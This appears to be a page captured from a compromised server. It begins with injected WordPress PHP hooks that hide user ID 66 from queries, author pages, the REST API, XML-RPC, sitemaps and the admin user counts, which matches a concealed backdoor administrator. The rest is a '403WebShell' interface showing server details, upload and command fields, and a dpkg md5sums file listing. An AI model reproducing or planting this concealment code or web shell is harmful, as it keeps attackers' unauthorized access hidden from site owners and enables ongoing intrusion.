add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 66; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 66 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 66 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 66; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 66; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/66(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); 403WebShell
403Webshell
Server IP : 167.235.224.122  /  Your IP : 216.73.216.110
Web Server : Apache/2.4.58 (Ubuntu)
System : Linux newplayground 6.8.0-136-generic #136-Ubuntu SMP PREEMPT_DYNAMIC Wed Jul 1 21:33:11 UTC 2026 aarch64
User : deploy ( 1000)
PHP Version : 8.4.23
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : OFF
Directory :  /var/lib/dpkg/info/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/lib/dpkg/info/python3-markdown-it.md5sums
b0bcd0e9be25ac8fdbd61d2282b44a97  usr/bin/markdown-it
ea63914c232b08d083a9ab6fcfe4a230  usr/lib/python3/dist-packages/markdown_it/__init__.py
9d59d7feeb303395496d4bf23d7195b3  usr/lib/python3/dist-packages/markdown_it/_compat.py
b151257ce7d3fb54706b692d07775d92  usr/lib/python3/dist-packages/markdown_it/_punycode.py
d41d8cd98f00b204e9800998ecf8427e  usr/lib/python3/dist-packages/markdown_it/cli/__init__.py
4c7fdfc47fb4d93af844853e3caf19ad  usr/lib/python3/dist-packages/markdown_it/cli/parse.py
d41d8cd98f00b204e9800998ecf8427e  usr/lib/python3/dist-packages/markdown_it/common/__init__.py
565e7c1f6106625889690dbef79879ed  usr/lib/python3/dist-packages/markdown_it/common/entities.py
3dad08af797bd6269167966020207196  usr/lib/python3/dist-packages/markdown_it/common/html_blocks.py
76ae5df5c697b71ee49fd969270e4edf  usr/lib/python3/dist-packages/markdown_it/common/html_re.py
a84efe541af6b70177a3a0906341deb8  usr/lib/python3/dist-packages/markdown_it/common/normalize_url.py
46c73a99d9bf5bc999816cff36be87d8  usr/lib/python3/dist-packages/markdown_it/common/utils.py
721b5cb89a4ff1a2c1e72a6890994998  usr/lib/python3/dist-packages/markdown_it/helpers/__init__.py
3004e5f50003b9d14d12c1d7c65ce439  usr/lib/python3/dist-packages/markdown_it/helpers/parse_link_destination.py
d9608e2fe3ca2033d5e14c8d658fce23  usr/lib/python3/dist-packages/markdown_it/helpers/parse_link_label.py
4e8641f151483d68958940e82b8a8bf7  usr/lib/python3/dist-packages/markdown_it/helpers/parse_link_title.py
a6cfa82d1af9ff849e146efc53de6a12  usr/lib/python3/dist-packages/markdown_it/main.py
b4bb7d81783fee04f7f2581cff8092f4  usr/lib/python3/dist-packages/markdown_it/parser_block.py
84542ae416c286dc0853743a76da233a  usr/lib/python3/dist-packages/markdown_it/parser_core.py
1beb0ca5456d1e45c580655d1719af2a  usr/lib/python3/dist-packages/markdown_it/parser_inline.py
fa4d8a790a76c91d924fb20bb481a703  usr/lib/python3/dist-packages/markdown_it/port.yaml
e9b9fdb2c70897414726606d8384f2a1  usr/lib/python3/dist-packages/markdown_it/presets/__init__.py
53b2f0a585be38771b6128ab8917632d  usr/lib/python3/dist-packages/markdown_it/presets/commonmark.py
be1a9b1487bed8001602177a59387c94  usr/lib/python3/dist-packages/markdown_it/presets/default.py
ce7d686211bff47a703436d9737668f0  usr/lib/python3/dist-packages/markdown_it/presets/zero.py
bd2fa011a5e69d2b68df68fbc59f8be6  usr/lib/python3/dist-packages/markdown_it/py.typed
d308e600baaf079d277deac1895d46d6  usr/lib/python3/dist-packages/markdown_it/renderer.py
7a1f6392240ec5b40e5b0978907b10ff  usr/lib/python3/dist-packages/markdown_it/ruler.py
9cc6b8e1831ef024bf28e64714415f4d  usr/lib/python3/dist-packages/markdown_it/rules_block/__init__.py
59cdbc59ed37b954dcb49179f3684bf9  usr/lib/python3/dist-packages/markdown_it/rules_block/blockquote.py
5f1537762d1ee890559db4f4e8d0dc5e  usr/lib/python3/dist-packages/markdown_it/rules_block/code.py
ccd971626399512f4c058c57c11b4413  usr/lib/python3/dist-packages/markdown_it/rules_block/fence.py
7f334b67aa9cfde8e34b855aa687a3d2  usr/lib/python3/dist-packages/markdown_it/rules_block/heading.py
fc2e6ed05d666b56d43448c815831dd4  usr/lib/python3/dist-packages/markdown_it/rules_block/hr.py
8e602ce51b7fa13f7d3540acbc46a1d7  usr/lib/python3/dist-packages/markdown_it/rules_block/html_block.py
d097b46356f594c5c38d6b855b6d3757  usr/lib/python3/dist-packages/markdown_it/rules_block/lheading.py
5db68f57761c14b88903484b00803a8a  usr/lib/python3/dist-packages/markdown_it/rules_block/list.py
e68485265672da6bae14bd5a79d7fb35  usr/lib/python3/dist-packages/markdown_it/rules_block/paragraph.py
5b750a5deca12f63102ef4cd2bf07ef8  usr/lib/python3/dist-packages/markdown_it/rules_block/reference.py
048ce3b6e2d7a847bac79569cb239fa3  usr/lib/python3/dist-packages/markdown_it/rules_block/state_block.py
ec9cf8fa40bd73c18a195fa79caaeee7  usr/lib/python3/dist-packages/markdown_it/rules_block/table.py
e23f8039d92cabae1c1d7fe33ba29d39  usr/lib/python3/dist-packages/markdown_it/rules_core/__init__.py
2f55881d984d3c0594144b49791af43c  usr/lib/python3/dist-packages/markdown_it/rules_core/block.py
54f130f239306bc8c41c3d998710fe49  usr/lib/python3/dist-packages/markdown_it/rules_core/inline.py
35dcb9d8ce84cc2b7094446c09e0ad04  usr/lib/python3/dist-packages/markdown_it/rules_core/linkify.py
3799e998a4c0d34c7a5aa1d0b9185d0c  usr/lib/python3/dist-packages/markdown_it/rules_core/normalize.py
bf5e8415418e3d504c6fd47297ad91c8  usr/lib/python3/dist-packages/markdown_it/rules_core/replacements.py
cacd3aacfc3cef9a1ca98b83ddf772e3  usr/lib/python3/dist-packages/markdown_it/rules_core/smartquotes.py
dde8c06fd81ea15f286467609a1adb39  usr/lib/python3/dist-packages/markdown_it/rules_core/state_core.py
82dcacd83207c8900bf4f1554d6e8183  usr/lib/python3/dist-packages/markdown_it/rules_core/text_join.py
b76069a45847707f4a78bead1ecc6732  usr/lib/python3/dist-packages/markdown_it/rules_inline/__init__.py
62b8bd2db794850960b4a6e4b6cdfddf  usr/lib/python3/dist-packages/markdown_it/rules_inline/autolink.py
922606ed2036810365127ccea4ccc74b  usr/lib/python3/dist-packages/markdown_it/rules_inline/backticks.py
a99de3ce978152a909e7c13f618c292d  usr/lib/python3/dist-packages/markdown_it/rules_inline/balance_pairs.py
2d3bb309a813c25d424bc001170bd47b  usr/lib/python3/dist-packages/markdown_it/rules_inline/emphasis.py
3c44f459b81438afc20e366ce4fb846f  usr/lib/python3/dist-packages/markdown_it/rules_inline/entity.py
c2dd789c89e9ae73bd012c4b0a7ac171  usr/lib/python3/dist-packages/markdown_it/rules_inline/escape.py
e13f54763b93429530138d6953064a29  usr/lib/python3/dist-packages/markdown_it/rules_inline/fragments_join.py
731c5fea6b65139be1e00ce8e1a266e8  usr/lib/python3/dist-packages/markdown_it/rules_inline/html_inline.py
cd23333e90f1aabe69bee53486e9a306  usr/lib/python3/dist-packages/markdown_it/rules_inline/image.py
ee7708256709d24e29b7273514bf6351  usr/lib/python3/dist-packages/markdown_it/rules_inline/link.py
6a76498c19d8ecbe5b70a0eb73b37ef6  usr/lib/python3/dist-packages/markdown_it/rules_inline/linkify.py
ae380d65c45016fa16e099d4600c0b17  usr/lib/python3/dist-packages/markdown_it/rules_inline/newline.py
525b1903dcde58d61158b600f21daaed  usr/lib/python3/dist-packages/markdown_it/rules_inline/state_inline.py
0e070faa867de04e9adaaf0034a6bffa  usr/lib/python3/dist-packages/markdown_it/rules_inline/strikethrough.py
387b1f8f53b736cceb12d92225e357f9  usr/lib/python3/dist-packages/markdown_it/rules_inline/text.py
e8fde237d5e693c8e7dc7ade53870823  usr/lib/python3/dist-packages/markdown_it/token.py
2ab500167e4fa9527bd2fe8213599eb6  usr/lib/python3/dist-packages/markdown_it/tree.py
dbe6d1cc8381c25dcfc71b8d99f912c6  usr/lib/python3/dist-packages/markdown_it/utils.py
c72246579c4437c07cebb86fbcbc6d90  usr/lib/python3/dist-packages/markdown_it_py-3.0.0.dist-info/INSTALLER
89d4bfa57970b0f142fdc45e49eaf2ce  usr/lib/python3/dist-packages/markdown_it_py-3.0.0.dist-info/METADATA
fedcd07fe3afc3d7c4f496564411a207  usr/lib/python3/dist-packages/markdown_it_py-3.0.0.dist-info/RECORD
fe76a5d309b5416824c2034fbf8a16cd  usr/lib/python3/dist-packages/markdown_it_py-3.0.0.dist-info/WHEEL
1456dddc54b5784919ca3e95d51f82c8  usr/lib/python3/dist-packages/markdown_it_py-3.0.0.dist-info/entry_points.txt
fb420c8b98bcf2d907713172bae007cd  usr/share/doc/python3-markdown-it/TODO.Debian
61fae617c3c237e38424fe23a5970721  usr/share/doc/python3-markdown-it/changelog.Debian.gz
afa978a529abc3861229e41b9a61b665  usr/share/doc/python3-markdown-it/copyright

Youez - 2016 - github.com/yon3zu
LinuXploit